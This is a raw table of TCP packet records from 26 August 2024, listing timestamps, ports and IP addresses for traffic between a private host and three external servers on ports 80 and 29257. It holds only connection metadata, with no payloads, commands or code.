Aug 26, 2024 23:29:22.277301073 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277302027 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277312040 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277327061 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277333975 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277349949 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277374983 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277466059 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277477026 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277488947 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277509928 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277535915 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277539015 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277554989 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277574062 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277582884 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277585030 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277595997 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277606964 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277607918 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277618885 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277628899 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277632952 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277653933 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277659893 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277671099 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277673006 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277694941 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277729988 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.277740955 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277750969 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.277786970 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282052040 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282063961 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282073975 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282084942 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282113075 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282114983 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282130003 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282141924 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282144070 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282152891 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282165051 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282166004 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282176971 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282188892 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282196045 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282200098 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282212019 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282223940 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282223940 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282238007 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282242060 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282248974 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282260895 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282263994 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282270908 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282288074 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282289028 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282309055 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282319069 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282320976 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.282340050 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.282363892 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.301671028 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.301683903 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.301695108 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.301727057 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.301763058 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.301805019 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.301815987 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.301831961 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.301846981 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.301858902 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.301876068 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.302206039 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.302263021 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.307177067 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.316164017 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:22.321526051 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.321547031 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.321557045 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.321566105 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.350505114 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350514889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350521088 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350603104 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350666046 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350677013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350687027 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350698948 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350709915 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350713015 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350718975 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350728989 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350733995 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350739956 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350752115 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350763083 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350764036 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350774050 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350784063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350786924 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350805044 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350809097 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350825071 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350830078 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350835085 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350846052 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350856066 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350857019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350867987 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350878000 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350879908 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350889921 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350899935 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350904942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350910902 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350920916 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350923061 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350931883 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350939035 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350948095 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350959063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350965023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350975990 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350984097 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.350986004 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.350999117 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.351005077 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.351008892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.351022005 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.351027012 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.351032019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.351033926 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.351052999 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.351069927 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.351094007 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361347914 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361358881 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361368895 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361399889 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361433029 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361479998 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361491919 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361504078 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361515045 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361535072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361562014 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361768007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361783981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361793995 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361804962 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361815929 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361819029 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361828089 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361835003 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361840010 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361865997 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361877918 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361905098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361917019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361926079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361937046 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.361965895 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.361980915 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362013102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362025023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362035990 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362046003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362062931 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362071991 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362081051 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362092972 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362095118 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362103939 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362114906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362128019 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362128019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362139940 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362149954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362159014 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362173080 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362195969 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362387896 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362399101 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362409115 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362420082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362441063 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362453938 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362670898 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362683058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362693071 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362703085 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362721920 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362735033 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362809896 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362822056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362831116 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.362857103 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362875938 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.362999916 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363014936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363033056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363044024 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363054037 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363068104 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363094091 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363141060 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363154888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363183022 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363193989 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363329887 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363346100 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363358021 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363369942 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363379955 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363409996 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363507986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363507986 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363519907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363531113 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363548994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363563061 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363564968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363576889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363586903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363598108 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363620043 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363640070 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363754988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363765955 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363775015 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363785028 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363795996 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.363806963 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363837004 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.363990068 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.364001036 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.364011049 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.364022017 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.364032030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.364044905 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.364047050 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.364054918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.364065886 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.364068031 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.364078045 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.364098072 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.364124060 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.365283012 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365293980 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365303993 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365314960 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365326881 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365338087 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365345955 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365349054 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365390062 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365391016 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365432978 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365443945 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365454912 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365467072 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365473032 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365509033 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365509987 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365607977 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365619898 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365629911 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365641117 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365652084 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365663052 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365667105 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365673065 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365683079 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365703106 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365739107 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365794897 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.365807056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.365817070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.365829945 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.365840912 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.365849018 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.365853071 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.365874052 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.365885019 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.365945101 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.365957022 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.365966082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.365997076 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.366022110 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.366431952 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366444111 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366455078 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366463900 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366483927 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366498947 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366533995 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366573095 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366584063 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366592884 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366604090 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366615057 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366615057 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366626978 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366636038 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366641998 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366647005 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366657019 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366667032 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366678953 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366698027 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366723061 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366745949 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366756916 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366766930 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366787910 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366811037 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366904974 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366916895 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366925955 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366938114 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366950035 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366954088 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366960049 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.366967916 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.366992950 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.367075920 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.367086887 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.367096901 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.367105961 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.367116928 CEST	80	49733	185.215.113.17	192.168.2.7
